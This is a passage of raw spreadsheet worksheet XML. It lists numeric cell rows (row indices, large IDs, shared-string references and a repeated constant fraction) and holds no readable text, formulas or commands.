        <v>31424.0</v>
      </c>
      <c r="B32574" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C32574" s="2" t="s">
        <v>31347</v>
      </c>
      <c r="D32574" s="2">
        <v>1.0</v>
      </c>
      <c r="E32574" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32574" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32575" ht="15.75" customHeight="1">
      <c r="A32575" s="1">
        <v>32303.0</v>
      </c>
      <c r="B32575" s="2">
        <v>5.5581818E7</v>
      </c>
      <c r="C32575" s="2" t="s">
        <v>31348</v>
      </c>
      <c r="D32575" s="2">
        <v>1.0</v>
      </c>
      <c r="E32575" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32575" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32576" ht="15.75" customHeight="1">
      <c r="A32576" s="1">
        <v>32777.0</v>
      </c>
      <c r="B32576" s="2">
        <v>6103717.0</v>
      </c>
      <c r="C32576" s="2" t="s">
        <v>31349</v>
      </c>
      <c r="D32576" s="2">
        <v>1.0</v>
      </c>
      <c r="E32576" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32576" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32577" ht="15.75" customHeight="1">
      <c r="A32577" s="1">
        <v>32847.0</v>
      </c>
      <c r="B32577" s="2">
        <v>6253471.0</v>
      </c>
      <c r="C32577" s="2" t="s">
        <v>31350</v>
      </c>
      <c r="D32577" s="2">
        <v>1.0</v>
      </c>
      <c r="E32577" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32577" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32578" ht="15.75" customHeight="1">
      <c r="A32578" s="1">
        <v>33117.0</v>
      </c>
      <c r="B32578" s="2">
        <v>6974649.0</v>
      </c>
      <c r="C32578" s="2" t="s">
        <v>31351</v>
      </c>
      <c r="D32578" s="2">
        <v>1.0</v>
      </c>
      <c r="E32578" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32578" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="32579" ht="15.75" customHeight="1">
      <c r="A32579" s="1">
        <v>103.0</v>
      </c>
      <c r="B32579" s="2">
        <v>1.2815043E7</v>
      </c>
      <c r="C32579" s="2" t="s">
        <v>31352</v>
      </c>
      <c r="D32579" s="2">
        <v>1.0</v>
      </c>
      <c r="E32579" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32579" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32580" ht="15.75" customHeight="1">
      <c r="A32580" s="1">
        <v>255.0</v>
      </c>
      <c r="B32580" s="2">
        <v>1.5126129E7</v>
      </c>
      <c r="C32580" s="2" t="s">
        <v>31353</v>
      </c>
      <c r="D32580" s="2">
        <v>1.0</v>
      </c>
      <c r="E32580" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32580" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32581" ht="15.75" customHeight="1">
      <c r="A32581" s="1">
        <v>306.0</v>
      </c>
      <c r="B32581" s="2">
        <v>1.5604467E7</v>
      </c>
      <c r="C32581" s="2" t="s">
        <v>31354</v>
      </c>
      <c r="D32581" s="2">
        <v>1.0</v>
      </c>
      <c r="E32581" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32581" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32582" ht="15.75" customHeight="1">
      <c r="A32582" s="1">
        <v>309.0</v>
      </c>
      <c r="B32582" s="2">
        <v>1.5608189E7</v>
      </c>
      <c r="C32582" s="2" t="s">
        <v>31355</v>
      </c>
      <c r="D32582" s="2">
        <v>1.0</v>
      </c>
      <c r="E32582" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32582" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32583" ht="15.75" customHeight="1">
      <c r="A32583" s="1">
        <v>355.0</v>
      </c>
      <c r="B32583" s="2">
        <v>1.6066414E7</v>
      </c>
      <c r="C32583" s="2" t="s">
        <v>31356</v>
      </c>
      <c r="D32583" s="2">
        <v>1.0</v>
      </c>
      <c r="E32583" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32583" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32584" ht="15.75" customHeight="1">
      <c r="A32584" s="1">
        <v>514.0</v>
      </c>
      <c r="B32584" s="2">
        <v>1.8185802E7</v>
      </c>
      <c r="C32584" s="2" t="s">
        <v>31357</v>
      </c>
      <c r="D32584" s="2">
        <v>1.0</v>
      </c>
      <c r="E32584" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32584" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32585" ht="15.75" customHeight="1">
      <c r="A32585" s="1">
        <v>532.0</v>
      </c>
      <c r="B32585" s="2">
        <v>1.8515151E7</v>
      </c>
      <c r="C32585" s="2" t="s">
        <v>31358</v>
      </c>
      <c r="D32585" s="2">
        <v>1.0</v>
      </c>
      <c r="E32585" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32585" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32586" ht="15.75" customHeight="1">
      <c r="A32586" s="1">
        <v>551.0</v>
      </c>
      <c r="B32586" s="2">
        <v>1.8786836E7</v>
      </c>
      <c r="C32586" s="2" t="s">
        <v>31359</v>
      </c>
      <c r="D32586" s="2">
        <v>1.0</v>
      </c>
      <c r="E32586" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32586" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32587" ht="15.75" customHeight="1">
      <c r="A32587" s="1">
        <v>886.0</v>
      </c>
      <c r="B32587" s="2">
        <v>2.2020131E7</v>
      </c>
      <c r="C32587" s="2" t="s">
        <v>31360</v>
      </c>
      <c r="D32587" s="2">
        <v>1.0</v>
      </c>
      <c r="E32587" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32587" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32588" ht="15.75" customHeight="1">
      <c r="A32588" s="1">
        <v>932.0</v>
      </c>
      <c r="B32588" s="2">
        <v>2.2360198E7</v>
      </c>
      <c r="C32588" s="2" t="s">
        <v>31361</v>
      </c>
      <c r="D32588" s="2">
        <v>1.0</v>
      </c>
      <c r="E32588" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32588" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32589" ht="15.75" customHeight="1">
      <c r="A32589" s="1">
        <v>987.0</v>
      </c>
      <c r="B32589" s="2">
        <v>2.2874777E7</v>
      </c>
      <c r="C32589" s="2" t="s">
        <v>31362</v>
      </c>
      <c r="D32589" s="2">
        <v>1.0</v>
      </c>
      <c r="E32589" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32589" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32590" ht="15.75" customHeight="1">
      <c r="A32590" s="1">
        <v>1267.0</v>
      </c>
      <c r="B32590" s="2">
        <v>2.5266486E7</v>
      </c>
      <c r="C32590" s="2" t="s">
        <v>31363</v>
      </c>
      <c r="D32590" s="2">
        <v>1.0</v>
      </c>
      <c r="E32590" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32590" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32591" ht="15.75" customHeight="1">
      <c r="A32591" s="1">
        <v>1372.0</v>
      </c>
      <c r="B32591" s="2">
        <v>2.6030646E7</v>
      </c>
      <c r="C32591" s="2" t="s">
        <v>31364</v>
      </c>
      <c r="D32591" s="2">
        <v>1.0</v>
      </c>
      <c r="E32591" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32591" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32592" ht="15.75" customHeight="1">
      <c r="A32592" s="1">
        <v>1389.0</v>
      </c>
      <c r="B32592" s="2">
        <v>2.6220106E7</v>
      </c>
      <c r="C32592" s="2" t="s">
        <v>31365</v>
      </c>
      <c r="D32592" s="2">
        <v>1.0</v>
      </c>
      <c r="E32592" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32592" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32593" ht="15.75" customHeight="1">
      <c r="A32593" s="1">
        <v>1457.0</v>
      </c>
      <c r="B32593" s="2">
        <v>2.6872053E7</v>
      </c>
      <c r="C32593" s="2" t="s">
        <v>31366</v>
      </c>
      <c r="D32593" s="2">
        <v>1.0</v>
      </c>
      <c r="E32593" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32593" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32594" ht="15.75" customHeight="1">
      <c r="A32594" s="1">
        <v>1466.0</v>
      </c>
      <c r="B32594" s="2">
        <v>2.6909777E7</v>
      </c>
      <c r="C32594" s="2" t="s">
        <v>31367</v>
      </c>
      <c r="D32594" s="2">
        <v>1.0</v>
      </c>
      <c r="E32594" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32594" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32595" ht="15.75" customHeight="1">
      <c r="A32595" s="1">
        <v>1561.0</v>
      </c>
      <c r="B32595" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C32595" s="2" t="s">
        <v>31368</v>
      </c>
      <c r="D32595" s="2">
        <v>1.0</v>
      </c>
      <c r="E32595" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32595" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32596" ht="15.75" customHeight="1">
      <c r="A32596" s="1">
        <v>1759.0</v>
      </c>
      <c r="B32596" s="2">
        <v>2.8909538E7</v>
      </c>
      <c r="C32596" s="2" t="s">
        <v>31369</v>
      </c>
      <c r="D32596" s="2">
        <v>1.0</v>
      </c>
      <c r="E32596" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32596" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32597" ht="15.75" customHeight="1">
      <c r="A32597" s="1">
        <v>1765.0</v>
      </c>
      <c r="B32597" s="2">
        <v>2.8955027E7</v>
      </c>
      <c r="C32597" s="2" t="s">
        <v>31370</v>
      </c>
      <c r="D32597" s="2">
        <v>1.0</v>
      </c>
      <c r="E32597" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32597" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32598" ht="15.75" customHeight="1">
      <c r="A32598" s="1">
        <v>1767.0</v>
      </c>
      <c r="B32598" s="2">
        <v>2.9003763E7</v>
      </c>
      <c r="C32598" s="2" t="s">
        <v>31371</v>
      </c>
      <c r="D32598" s="2">
        <v>1.0</v>
      </c>
      <c r="E32598" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32598" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32599" ht="15.75" customHeight="1">
      <c r="A32599" s="1">
        <v>1774.0</v>
      </c>
      <c r="B32599" s="2">
        <v>2.9028157E7</v>
      </c>
      <c r="C32599" s="2" t="s">
        <v>31372</v>
      </c>
      <c r="D32599" s="2">
        <v>1.0</v>
      </c>
      <c r="E32599" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32599" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32600" ht="15.75" customHeight="1">
      <c r="A32600" s="1">
        <v>1830.0</v>
      </c>
      <c r="B32600" s="2">
        <v>2.9328914E7</v>
      </c>
      <c r="C32600" s="2" t="s">
        <v>31373</v>
      </c>
      <c r="D32600" s="2">
        <v>1.0</v>
      </c>
      <c r="E32600" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32600" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32601" ht="15.75" customHeight="1">
      <c r="A32601" s="1">
        <v>1865.0</v>
      </c>
      <c r="B32601" s="2">
        <v>2.9578643E7</v>
      </c>
      <c r="C32601" s="2" t="s">
        <v>31374</v>
      </c>
      <c r="D32601" s="2">
        <v>1.0</v>
      </c>
      <c r="E32601" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32601" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32602" ht="15.75" customHeight="1">
      <c r="A32602" s="1">
        <v>1905.0</v>
      </c>
      <c r="B32602" s="2">
        <v>2.999566E7</v>
      </c>
      <c r="C32602" s="2" t="s">
        <v>31375</v>
      </c>
      <c r="D32602" s="2">
        <v>1.0</v>
      </c>
      <c r="E32602" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32602" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32603" ht="15.75" customHeight="1">
      <c r="A32603" s="1">
        <v>2001.0</v>
      </c>
      <c r="B32603" s="2">
        <v>3.0619201E7</v>
      </c>
      <c r="C32603" s="2" t="s">
        <v>31376</v>
      </c>
      <c r="D32603" s="2">
        <v>1.0</v>
      </c>
      <c r="E32603" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32603" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32604" ht="15.75" customHeight="1">
      <c r="A32604" s="1">
        <v>2093.0</v>
      </c>
      <c r="B32604" s="2">
        <v>3.129258E7</v>
      </c>
      <c r="C32604" s="2" t="s">
        <v>31377</v>
      </c>
      <c r="D32604" s="2">
        <v>1.0</v>
      </c>
      <c r="E32604" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32604" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32605" ht="15.75" customHeight="1">
      <c r="A32605" s="1">
        <v>2103.0</v>
      </c>
      <c r="B32605" s="2">
        <v>3.1306336E7</v>
      </c>
      <c r="C32605" s="2" t="s">
        <v>31378</v>
      </c>
      <c r="D32605" s="2">
        <v>1.0</v>
      </c>
      <c r="E32605" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32605" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32606" ht="15.75" customHeight="1">
      <c r="A32606" s="1">
        <v>2167.0</v>
      </c>
      <c r="B32606" s="2">
        <v>3.17669E7</v>
      </c>
      <c r="C32606" s="2" t="s">
        <v>31379</v>
      </c>
      <c r="D32606" s="2">
        <v>1.0</v>
      </c>
      <c r="E32606" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32606" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32607" ht="15.75" customHeight="1">
      <c r="A32607" s="1">
        <v>2245.0</v>
      </c>
      <c r="B32607" s="2">
        <v>3.2327512E7</v>
      </c>
      <c r="C32607" s="2" t="s">
        <v>31380</v>
      </c>
      <c r="D32607" s="2">
        <v>1.0</v>
      </c>
      <c r="E32607" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32607" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32608" ht="15.75" customHeight="1">
      <c r="A32608" s="1">
        <v>2355.0</v>
      </c>
      <c r="B32608" s="2">
        <v>3.3136938E7</v>
      </c>
      <c r="C32608" s="2" t="s">
        <v>31381</v>
      </c>
      <c r="D32608" s="2">
        <v>1.0</v>
      </c>
      <c r="E32608" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32608" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32609" ht="15.75" customHeight="1">
      <c r="A32609" s="1">
        <v>2401.0</v>
      </c>
      <c r="B32609" s="2">
        <v>3.3428868E7</v>
      </c>
      <c r="C32609" s="2" t="s">
        <v>31382</v>
      </c>
      <c r="D32609" s="2">
        <v>1.0</v>
      </c>
      <c r="E32609" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32609" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32610" ht="15.75" customHeight="1">
      <c r="A32610" s="1">
        <v>2434.0</v>
      </c>
      <c r="B32610" s="2">
        <v>3.36218E7</v>
      </c>
      <c r="C32610" s="2" t="s">
        <v>31383</v>
      </c>
      <c r="D32610" s="2">
        <v>1.0</v>
      </c>
      <c r="E32610" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32610" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32611" ht="15.75" customHeight="1">
      <c r="A32611" s="1">
        <v>2611.0</v>
      </c>
      <c r="B32611" s="2">
        <v>3.442774E7</v>
      </c>
      <c r="C32611" s="2" t="s">
        <v>31384</v>
      </c>
      <c r="D32611" s="2">
        <v>1.0</v>
      </c>
      <c r="E32611" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32611" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32612" ht="15.75" customHeight="1">
      <c r="A32612" s="1">
        <v>2752.0</v>
      </c>
      <c r="B32612" s="2">
        <v>3.5100614E7</v>
      </c>
      <c r="C32612" s="2" t="s">
        <v>31385</v>
      </c>
      <c r="D32612" s="2">
        <v>1.0</v>
      </c>
      <c r="E32612" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32612" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32613" ht="15.75" customHeight="1">
      <c r="A32613" s="1">
        <v>2807.0</v>
      </c>
      <c r="B32613" s="2">
        <v>3.5347042E7</v>
      </c>
      <c r="C32613" s="2" t="s">
        <v>31386</v>
      </c>
      <c r="D32613" s="2">
        <v>1.0</v>
      </c>
      <c r="E32613" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32613" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32614" ht="15.75" customHeight="1">
      <c r="A32614" s="1">
        <v>2847.0</v>
      </c>
      <c r="B32614" s="2">
        <v>3.5470557E7</v>
      </c>
      <c r="C32614" s="2" t="s">
        <v>31387</v>
      </c>
      <c r="D32614" s="2">
        <v>1.0</v>
      </c>
      <c r="E32614" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32614" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32615" ht="15.75" customHeight="1">
      <c r="A32615" s="1">
        <v>2881.0</v>
      </c>
      <c r="B32615" s="2">
        <v>3.5667808E7</v>
      </c>
      <c r="C32615" s="2" t="s">
        <v>31388</v>
      </c>
      <c r="D32615" s="2">
        <v>1.0</v>
      </c>
      <c r="E32615" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32615" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32616" ht="15.75" customHeight="1">
      <c r="A32616" s="1">
        <v>3112.0</v>
      </c>
      <c r="B32616" s="2">
        <v>3.6768381E7</v>
      </c>
      <c r="C32616" s="2" t="s">
        <v>31389</v>
      </c>
      <c r="D32616" s="2">
        <v>1.0</v>
      </c>
      <c r="E32616" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32616" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32617" ht="15.75" customHeight="1">
      <c r="A32617" s="1">
        <v>3139.0</v>
      </c>
      <c r="B32617" s="2">
        <v>3.6903274E7</v>
      </c>
      <c r="C32617" s="2" t="s">
        <v>31390</v>
      </c>
      <c r="D32617" s="2">
        <v>1.0</v>
      </c>
      <c r="E32617" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32617" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32618" ht="15.75" customHeight="1">
      <c r="A32618" s="1">
        <v>3178.0</v>
      </c>
      <c r="B32618" s="2">
        <v>3.7098019E7</v>
      </c>
      <c r="C32618" s="2" t="s">
        <v>31391</v>
      </c>
      <c r="D32618" s="2">
        <v>1.0</v>
      </c>
      <c r="E32618" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32618" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32619" ht="15.75" customHeight="1">
      <c r="A32619" s="1">
        <v>3237.0</v>
      </c>
      <c r="B32619" s="2">
        <v>3.734709E7</v>
      </c>
      <c r="C32619" s="2" t="s">
        <v>31392</v>
      </c>
      <c r="D32619" s="2">
        <v>1.0</v>
      </c>
      <c r="E32619" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32619" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32620" ht="15.75" customHeight="1">
      <c r="A32620" s="1">
        <v>3315.0</v>
      </c>
      <c r="B32620" s="2">
        <v>3.7609309E7</v>
      </c>
      <c r="C32620" s="2" t="s">
        <v>31393</v>
      </c>
      <c r="D32620" s="2">
        <v>1.0</v>
      </c>
      <c r="E32620" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32620" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32621" ht="15.75" customHeight="1">
      <c r="A32621" s="1">
        <v>3317.0</v>
      </c>
      <c r="B32621" s="2">
        <v>3.7609895E7</v>
      </c>
      <c r="C32621" s="2" t="s">
        <v>31394</v>
      </c>
      <c r="D32621" s="2">
        <v>1.0</v>
      </c>
      <c r="E32621" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32621" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32622" ht="15.75" customHeight="1">
      <c r="A32622" s="1">
        <v>3326.0</v>
      </c>
      <c r="B32622" s="2">
        <v>3.7676302E7</v>
      </c>
      <c r="C32622" s="2" t="s">
        <v>31395</v>
      </c>
      <c r="D32622" s="2">
        <v>1.0</v>
      </c>
      <c r="E32622" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32622" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32623" ht="15.75" customHeight="1">
      <c r="A32623" s="1">
        <v>3335.0</v>
      </c>
      <c r="B32623" s="2">
        <v>3.7708925E7</v>
      </c>
      <c r="C32623" s="2" t="s">
        <v>31396</v>
      </c>
      <c r="D32623" s="2">
        <v>1.0</v>
      </c>
      <c r="E32623" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32623" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32624" ht="15.75" customHeight="1">
      <c r="A32624" s="1">
        <v>3378.0</v>
      </c>
      <c r="B32624" s="2">
        <v>3.793113E7</v>
      </c>
      <c r="C32624" s="2" t="s">
        <v>31397</v>
      </c>
      <c r="D32624" s="2">
        <v>1.0</v>
      </c>
      <c r="E32624" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32624" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32625" ht="15.75" customHeight="1">
      <c r="A32625" s="1">
        <v>3426.0</v>
      </c>
      <c r="B32625" s="2">
        <v>3.8175184E7</v>
      </c>
      <c r="C32625" s="2" t="s">
        <v>31398</v>
      </c>
      <c r="D32625" s="2">
        <v>1.0</v>
      </c>
      <c r="E32625" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32625" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32626" ht="15.75" customHeight="1">
      <c r="A32626" s="1">
        <v>3568.0</v>
      </c>
      <c r="B32626" s="2">
        <v>3.8939646E7</v>
      </c>
      <c r="C32626" s="2" t="s">
        <v>31399</v>
      </c>
      <c r="D32626" s="2">
        <v>1.0</v>
      </c>
      <c r="E32626" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32626" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32627" ht="15.75" customHeight="1">
      <c r="A32627" s="1">
        <v>3685.0</v>
      </c>
      <c r="B32627" s="2">
        <v>3.9480992E7</v>
      </c>
      <c r="C32627" s="2" t="s">
        <v>31400</v>
      </c>
      <c r="D32627" s="2">
        <v>1.0</v>
      </c>
      <c r="E32627" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32627" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32628" ht="15.75" customHeight="1">
      <c r="A32628" s="1">
        <v>3780.0</v>
      </c>
      <c r="B32628" s="2">
        <v>3.9909522E7</v>
      </c>
      <c r="C32628" s="2" t="s">
        <v>31401</v>
      </c>
      <c r="D32628" s="2">
        <v>1.0</v>
      </c>
      <c r="E32628" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32628" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32629" ht="15.75" customHeight="1">
      <c r="A32629" s="1">
        <v>4008.0</v>
      </c>
      <c r="B32629" s="2">
        <v>4.0915738E7</v>
      </c>
      <c r="C32629" s="2" t="s">
        <v>31402</v>
      </c>
      <c r="D32629" s="2">
        <v>1.0</v>
      </c>
      <c r="E32629" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32629" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32630" ht="15.75" customHeight="1">
      <c r="A32630" s="1">
        <v>4095.0</v>
      </c>
      <c r="B32630" s="2">
        <v>4.1260901E7</v>
      </c>
      <c r="C32630" s="2" t="s">
        <v>31403</v>
      </c>
      <c r="D32630" s="2">
        <v>1.0</v>
      </c>
      <c r="E32630" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32630" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32631" ht="15.75" customHeight="1">
      <c r="A32631" s="1">
        <v>4252.0</v>
      </c>
      <c r="B32631" s="2">
        <v>4.181164E7</v>
      </c>
      <c r="C32631" s="2" t="s">
        <v>31404</v>
      </c>
      <c r="D32631" s="2">
        <v>1.0</v>
      </c>
      <c r="E32631" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32631" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32632" ht="15.75" customHeight="1">
      <c r="A32632" s="1">
        <v>4257.0</v>
      </c>
      <c r="B32632" s="2">
        <v>4.1819272E7</v>
      </c>
      <c r="C32632" s="2" t="s">
        <v>31405</v>
      </c>
      <c r="D32632" s="2">
        <v>1.0</v>
      </c>
      <c r="E32632" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32632" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32633" ht="15.75" customHeight="1">
      <c r="A32633" s="1">
        <v>4296.0</v>
      </c>
      <c r="B32633" s="2">
        <v>4.1914814E7</v>
      </c>
      <c r="C32633" s="2" t="s">
        <v>31406</v>
      </c>
      <c r="D32633" s="2">
        <v>1.0</v>
      </c>
      <c r="E32633" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32633" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32634" ht="15.75" customHeight="1">
      <c r="A32634" s="1">
        <v>4903.0</v>
      </c>
      <c r="B32634" s="2">
        <v>4.3917499E7</v>
      </c>
      <c r="C32634" s="2" t="s">
        <v>31407</v>
      </c>
      <c r="D32634" s="2">
        <v>1.0</v>
      </c>
      <c r="E32634" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32634" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32635" ht="15.75" customHeight="1">
      <c r="A32635" s="1">
        <v>4919.0</v>
      </c>
      <c r="B32635" s="2">
        <v>4.395854E7</v>
      </c>
      <c r="C32635" s="2" t="s">
        <v>31408</v>
      </c>
      <c r="D32635" s="2">
        <v>1.0</v>
      </c>
      <c r="E32635" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32635" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32636" ht="15.75" customHeight="1">
      <c r="A32636" s="1">
        <v>4931.0</v>
      </c>
      <c r="B32636" s="2">
        <v>4.3993646E7</v>
      </c>
      <c r="C32636" s="2" t="s">
        <v>31409</v>
      </c>
      <c r="D32636" s="2">
        <v>1.0</v>
      </c>
      <c r="E32636" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32636" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32637" ht="15.75" customHeight="1">
      <c r="A32637" s="1">
        <v>4979.0</v>
      </c>
      <c r="B32637" s="2">
        <v>4.4117455E7</v>
      </c>
      <c r="C32637" s="2" t="s">
        <v>31410</v>
      </c>
      <c r="D32637" s="2">
        <v>1.0</v>
      </c>
      <c r="E32637" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32637" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32638" ht="15.75" customHeight="1">
      <c r="A32638" s="1">
        <v>5042.0</v>
      </c>
      <c r="B32638" s="2">
        <v>4.4304594E7</v>
      </c>
      <c r="C32638" s="2" t="s">
        <v>31411</v>
      </c>
      <c r="D32638" s="2">
        <v>1.0</v>
      </c>
      <c r="E32638" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32638" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32639" ht="15.75" customHeight="1">
      <c r="A32639" s="1">
        <v>5056.0</v>
      </c>
      <c r="B32639" s="2">
        <v>4.4346821E7</v>
      </c>
      <c r="C32639" s="2" t="s">
        <v>31412</v>
      </c>
      <c r="D32639" s="2">
        <v>1.0</v>
      </c>
      <c r="E32639" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32639" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32640" ht="15.75" customHeight="1">
      <c r="A32640" s="1">
        <v>5112.0</v>
      </c>
      <c r="B32640" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C32640" s="2" t="s">
        <v>31413</v>
      </c>
      <c r="D32640" s="2">
        <v>1.0</v>
      </c>
      <c r="E32640" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F32640" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="32641" ht="15.75" customHeight="1">
      <c r="A32641" s="1">
        <v>5159.0</v>
      </c>
